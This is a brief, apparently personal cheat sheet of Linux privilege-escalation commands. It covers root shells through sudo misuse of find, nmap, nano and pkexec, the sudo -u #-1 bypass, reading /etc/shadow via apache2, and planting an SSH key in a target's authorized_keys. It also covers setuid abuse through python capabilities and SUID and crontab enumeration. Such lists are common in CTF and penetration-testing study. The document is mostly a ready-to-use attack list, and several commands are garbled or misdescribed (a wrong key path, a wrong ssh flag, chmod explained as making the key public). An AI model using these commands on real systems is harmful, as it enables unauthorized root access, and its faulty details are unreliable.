😄CHEAT SHEET

PRIVILAGE ESCALATION CHEAT SHEET

Privilege escalation is step to gain illicit access of elevated right, or privilege beyond entitled for user. This attack perform to gain unauthorized access to system (root). It exploit human behavior, design flaws or oversight of Operating System. It also known as lateral movement in attack chain.

Cheat Sheat

Sudo - l

sudo find /bin -name nano -exec /bin/sh \;

sudo find /bin -name nano -exec /bin/sh \;

echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

sudo apache2 -f /etc/shadow

sudo su root or /bin/bash -p

NANO>>CTRL+R >> CTRL+X >>reset; sh 1>&0 2>&0

Sudo pkexec /bin/sh
(ALL:!root) /bin/bash
Sudo -u #-1 /bin/bash
Apache2 find in sudo -l
Sudo apache2 -f /etc/shadow

Docker

www-data / no sudo (stable connection)

python -c 'import pty; pty.spawn("/bin/bash")'

Find specific file

Find / -name *.txt 2>/dev/null

Generate SSH key.

Our machine –$ ssh-keygen -f mykey
Target machine –$ echo “<mykey.pub>” > /.ssh/authorized_key
Chmod 600 mykey – change permission to public
Ssh -I mykey <targgetusername>@remoteIP

SUID

Find / -perm -u=s -type f 2>/dev/null
Getcap -r / 2>/dev/null

For getcap vuln -

/usr/bin/python2.6 -c ‘import os;os.setuid(0);os.system(“/bin/bash”)’

Cronjab tab

Cat /etc/crontab